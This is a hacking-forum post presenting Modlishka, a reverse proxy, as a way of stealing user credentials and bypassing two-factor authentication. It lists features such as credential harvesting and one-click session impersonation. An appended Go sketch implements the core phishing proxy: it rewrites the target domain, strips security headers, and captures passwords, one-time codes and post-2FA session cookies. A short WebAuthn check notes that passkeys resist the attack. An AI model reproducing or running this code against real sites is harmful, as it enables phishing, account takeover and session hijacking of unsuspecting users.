0xploit.com - General Hacking

Modlishka - Reverse Proxy - Bypass 2FA

Hnisa (joined Jun 3, 2023)
In this article, I propose to consider a method for stealing user credentials using reverse-proxy technology, which will allow us to bypass two-factor authentication.

To do this, we will use and customize a tool that is quite famous in certain circles called Modlishka.

Modlishka is a powerful and flexible HTTP reverse proxy. It implements a completely new and interesting browser-based HTTP traffic stream processing approach that allows you to transparently proxy multi-domain targeted traffic, both TLS and non-TLS, through a single domain without the need to install any additional certificate on the client.

What exactly does this mean? In short, it just has a lot of potential that can be used in many use cases.

From a security point of view, Modlishka can currently be used to:
  • Conduct ethical phishing penetration tests using a transparent and automatic reverse proxy component with universal support for two-factor authentication.
  • Perform automatic HTTP 301 browser cache poisoning and permanent URL capture (no TLS).
  • Diagnose and intercept HTTP traffic of browser applications in the context of the "Client Domain Hooking" attack.
  • Wrap legacy websites in TLS to obfuscate bots, automated crawlers, etc.
Modlishka was written as an attempt to overcome the standard reverse proxy limitations and as a personal challenge to see what's possible with enough motivation and a little extra research time.

The results achieved were very interesting and the tool was initially released and then updated to:
  • Highlight the weaknesses of the currently used two-factor authentication (2FA) scheme so that adequate security solutions can be created and implemented in the industry.
  • Support other projects that could benefit from a universal and transparent reverse proxy.
  • Raise community awareness of modern phishing techniques and strategies and support penetration testers in their daily work.
Modlishka was primarily written for security related tasks. However, it may be useful in other non-security use cases.

Effective proxying!

Features

General:
  • Point-and-click HTTP and HTTPS reverse proxying of an arbitrary domain.
  • Full control over the flow of cross-origin TLS traffic from your users' browsers (without the need to install any additional certificates on the client).
  • Easy and fast configuration with command line options and JSON configuration files.
  • Template-based JavaScript payload injection.
  • Wrapping websites with additional "security": TLS wrapping, authentication, appropriate security headers, etc.
  • Stripping websites of all encryption and security headers (back to 90s MITM style).
  • Stateless design. Can be easily scaled to handle an arbitrary amount of traffic - for example, through a DNS load balancer.
  • Can be easily extended with your own ideas through modular plugins.
  • TLS certificate auto test plugin for the proxy domain (requires a self-signed CA certificate).
  • Written in Go, so it works on almost all platforms and architectures: Windows, OSX, Linux and BSD are supported.
Security related:
  • Support for most 2FA authentication schemes (out of the box).
  • Practical implementation of the "Client Domain Hooking" attack. Supported by the diagnostic plugin.
  • Collection of user credentials (with context based on IDs passed in a URL parameter).
  • A web panel plugin with a summary of auto-collected credentials and a one-click user session impersonation module (proof-of-concept / beta).
  • No website templates (just point Modlishka to the target domain - in most cases it will be processed automatically without additional manual configuration).
Installation & Usage

 
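Added example, not part of the original post and not Modlishka's own code. Modlishka is written in Go, so the mechanism the post describes is sketched here in Go: the proxy owns one domain (with a wildcard certificate) and rewrites every reference to the target domain into the matching subdomain of its own, so the victim's browser holds a valid TLS session with the proxy and no certificate has to be installed on the client; security headers that would break the rewritten origin are dropped; the login POST and, more importantly, the session cookie issued after the 2FA step are recorded. The domains example.com and example-login.test, the credential field names and the sample response are constructed placeholders. The last function goes beyond the post: it is the browser-side RP ID scoping rule of WebAuthn/FIDO2, included to show why "support for most 2FA schemes" does not extend to origin-bound authenticators.

```go
package main

import (
	"fmt"
	"net/http"
	"net/url"
	"regexp"
	"strings"
)

// Constructed placeholder domains, not from the original post.
const (
	targetDomain = "example.com"        // hypothetical site being impersonated
	proxyDomain  = "example-login.test" // hypothetical attacker-controlled domain
)

// The target domain and any subdomain of it, as found in HTML, JavaScript,
// Location and Set-Cookie values.
var targetHostRe = regexp.MustCompile(`\b(?:[a-z0-9-]+\.)*` + regexp.QuoteMeta(targetDomain) + `\b`)

// toProxyHost maps api.example.com -> api.example-login.test. Keeping the subdomain
// prefix lets one wildcard certificate on the proxy domain cover every target
// subdomain. The inverse mapping is applied to Host/Origin/Referer of inbound requests.
func toProxyHost(host string) string {
	if host == targetDomain {
		return proxyDomain
	}
	if strings.HasSuffix(host, "."+targetDomain) {
		return strings.TrimSuffix(host, targetDomain) + proxyDomain
	}
	return host // unrelated hosts pass through untouched
}

// rewriteResponseText rewrites every target-domain reference to the proxy domain.
func rewriteResponseText(s string) string {
	return targetHostRe.ReplaceAllStringFunc(s, toProxyHost)
}

// rewriteResponseHeaders rewrites Location/Set-Cookie and drops headers that would
// break the proxied origin: a CSP allowlist would block scripts from the rewritten
// hosts, and HSTS/HPKP belong to the real domain, which the browser never contacts.
func rewriteResponseHeaders(h http.Header) http.Header {
	out := http.Header{}
	for name, vals := range h {
		switch http.CanonicalHeaderKey(name) {
		case "Content-Security-Policy", "Content-Security-Policy-Report-Only",
			"Strict-Transport-Security", "Public-Key-Pins":
			continue
		}
		for _, v := range vals {
			out.Add(name, rewriteResponseText(v))
		}
	}
	return out
}

// captureCredentials pulls likely login fields (constructed heuristic names) from a POST body.
func captureCredentials(form url.Values) map[string]string {
	got := map[string]string{}
	for k, v := range form {
		switch lk := strings.ToLower(k); lk {
		case "user", "username", "login", "email", "pass", "password", "passwd", "otp", "code":
			if len(v) > 0 {
				got[lk] = v[0]
			}
		}
	}
	return got
}

// captureSessionCookies records the cookies the target sets once password and 2FA
// both succeeded. That post-2FA session cookie is what makes the OTP irrelevant:
// the attacker replays the session, never the code.
func captureSessionCookies(setCookie []string) map[string]string {
	got := map[string]string{}
	for _, raw := range setCookie {
		if nv := strings.SplitN(strings.SplitN(raw, ";", 2)[0], "=", 2); len(nv) == 2 {
			got[strings.TrimSpace(nv[0])] = nv[1]
		}
	}
	return got
}

// rpIDAllowed is the browser-side WebAuthn/FIDO2 scoping rule: a credential for RP ID
// example.com is usable only when the page host is that RP ID or a subdomain of it.
// The proxy domain fails it, so origin-bound authenticators survive this attack.
func rpIDAllowed(rpID, originHost string) bool {
	return originHost == rpID || strings.HasSuffix(originHost, "."+rpID)
}

func main() {
	fmt.Println(rewriteResponseText(`<form action="https://login.example.com/session">`))
	h := http.Header{"Location": {"https://account.example.com/home"},
		"Set-Cookie": {"sid=abc123; Domain=.example.com; Secure; HttpOnly"}}
	rh := rewriteResponseHeaders(h)
	fmt.Println(rh.Get("Location"), captureSessionCookies(rh["Set-Cookie"]))
	form, _ := url.ParseQuery("username=alice&password=hunter2&otp=123456&remember=1")
	fmt.Println(captureCredentials(form))
	fmt.Println(rpIDAllowed(targetDomain, "login."+targetDomain), rpIDAllowed(targetDomain, "login."+proxyDomain))
}
```

The rewriting is deliberately host-based rather than template-based, which is the property the post calls "no website templates": once the target and proxy domains are known, any page the target serves is rewritten the same way. The detection-side corollary is the same one the rpIDAllowed check illustrates: anything bound to the real origin (passkeys, U2F, origin-checked tokens) breaks in the proxy, while anything the user types or copies (password, TOTP, push-approved sessions) does not.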